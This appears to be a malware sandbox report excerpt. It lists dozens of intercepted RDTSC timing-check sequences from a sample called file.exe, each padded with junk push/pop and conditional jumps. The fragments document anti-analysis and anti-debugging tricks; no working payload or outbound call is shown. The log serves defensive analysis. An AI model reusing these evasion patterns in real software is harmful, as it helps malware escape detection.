Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 987626 second address: 987633 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8A2C7FDC16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 987633 second address: 987653 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8A2C4FB2A3h 0x00000009 push edx 0x0000000a pop edx 0x0000000b jo 00007F8A2C4FB296h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1500A second address: A15010 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A178B3 second address: A178C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8A2C4FB29Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A178C2 second address: A178C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A178C8 second address: A178DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F8A2C4FB2A0h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A17479 second address: A1747D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1EDD6 second address: A1EDEC instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8A2C4FB296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnp 00007F8A2C4FB29Ch 0x00000010 jno 00007F8A2C4FB296h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1F0FB second address: A1F105 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8A2C7FDC16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1F275 second address: A1F288 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F8A2C4FB296h 0x0000000a popad 0x0000000b jnc 00007F8A2C4FB298h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1F515 second address: A1F519 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A201B4 second address: A201B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A24300 second address: A24310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8A2C7FDC1Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A24310 second address: A2432A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8A2C4FB296h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnc 00007F8A2C4FB29Ah 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2432A second address: A2432E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A23703 second address: A23707 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A23707 second address: A2370D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2370D second address: A23717 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A23717 second address: A2371B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2371B second address: A23744 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007F8A2C4FB2A3h 0x0000000d je 00007F8A2C4FB2A2h 0x00000013 jng 00007F8A2C4FB296h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A23744 second address: A2375A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F8A2C7FDC1Ah 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007F8A2C7FDC16h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2375A second address: A2375E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A239F8 second address: A239FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A239FC second address: A23A02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A23A02 second address: A23A08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A23A08 second address: A23A24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F8A2C4FB2A0h 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A23C20 second address: A23C24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A23C24 second address: A23C57 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F8A2C4FB2A6h 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push edi 0x00000010 pop edi 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push ebx 0x00000016 jo 00007F8A2C4FB296h 0x0000001c pop ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 pop eax 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A23C57 second address: A23C5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A23C5B second address: A23C63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A23C63 second address: A23C69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A23C69 second address: A23C6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A26A12 second address: A26A1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A26FD7 second address: A26FF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 jc 00007F8A2C4FB296h 0x00000016 pop edx 0x00000017 popad 0x00000018 jp 00007F8A2C4FB2B8h 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A26FF8 second address: A26FFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A26FFE second address: A2700B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2F396 second address: A2F39A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2F39A second address: A2F3AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007F8A2C4FB296h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2F3AD second address: A2F3BB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F8A2C7FDC16h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2F3BB second address: A2F3C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2F3C1 second address: A2F3C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2F3C6 second address: A2F3CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2F3CC second address: A2F3D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2F3D2 second address: A2F3D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2D748 second address: A2D754 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2D754 second address: A2D758 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2DC90 second address: A2DCA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C7FDC24h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CD6CC second address: 9CD6E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jp 00007F8A2C4FB296h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jnc 00007F8A2C4FB296h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2EB49 second address: A2EB80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C7FDC24h 0x00000007 jg 00007F8A2C7FDC16h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F8A2C7FDC26h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2EB80 second address: A2EB8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F8A2C4FB296h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2EB8F second address: A2EB95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2EB95 second address: A2EB99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2F0D3 second address: A2F0DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3241B second address: A32420 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A32420 second address: A3242C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007F8A2C7FDC16h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3242C second address: A32430 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A326CB second address: A326E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8A2C7FDC26h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A326E5 second address: A3270E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8A2C4FB2A4h 0x0000000d jmp 00007F8A2C4FB29Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3270E second address: A32712 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A32A33 second address: A32A40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F8A2C4FB296h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A37727 second address: A3772D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3772D second address: A37736 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A37736 second address: A3773A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3773A second address: A37754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8A2C4FB2A4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A37754 second address: A3775E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F8A2C7FDC16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3775E second address: A37768 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A37768 second address: A3776C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3E96C second address: A3E971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3E971 second address: A3E976 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3E976 second address: A3E984 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jl 00007F8A2C4FB296h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3E984 second address: A3E998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007F8A2C7FDC18h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3E998 second address: A3E99E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3E99E second address: A3E9D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8A2C7FDC26h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007F8A2C7FDC1Fh 0x00000012 jbe 00007F8A2C7FDC16h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3E9D4 second address: A3E9E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C4FB29Eh 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3ED9F second address: A3EDBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F8A2C7FDC20h 0x0000000e jng 00007F8A2C7FDC16h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3EDBE second address: A3EDCA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3EDCA second address: A3EDD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3EDD0 second address: A3EDD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3EDD4 second address: A3EE0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F8A2C7FDC1Ch 0x0000000d popad 0x0000000e pushad 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push eax 0x00000013 pop eax 0x00000014 jmp 00007F8A2C7FDC26h 0x00000019 jnl 00007F8A2C7FDC16h 0x0000001f popad 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3F071 second address: A3F077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A466D4 second address: A466F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8A2C7FDC29h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A466F1 second address: A466F7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A466F7 second address: A4670E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8A2C7FDC1Fh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5138A second address: A5138E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5138E second address: A51398 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8A2C7FDC16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A53FC9 second address: A53FCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A53FCD second address: A53FEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C7FDC24h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A53FEA second address: A53FFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007F8A2C4FB2A2h 0x0000000e pushad 0x0000000f push edx 0x00000010 pop edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A570C5 second address: A570C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B5C6 second address: A5B5CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B5CA second address: A5B5FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C7FDC1Fh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e jmp 00007F8A2C7FDC27h 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A640B9 second address: A640BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A640BD second address: A640C3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A640C3 second address: A640D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e jp 00007F8A2C4FB296h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6AFB3 second address: A6AFBD instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8A2C7FDC16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6AFBD second address: A6AFC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A73A38 second address: A73A4C instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8A2C7FDC16h 0x00000008 jmp 00007F8A2C7FDC1Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A71FD4 second address: A71FDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A71FDA second address: A71FEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push edx 0x00000009 pop edx 0x0000000a jne 00007F8A2C7FDC16h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A71FEB second address: A71FFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F8A2C4FB296h 0x0000000a jno 00007F8A2C4FB296h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A71FFB second address: A71FFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A71FFF second address: A72025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F8A2C4FB296h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8A2C4FB2A8h 0x00000013 rdtsc
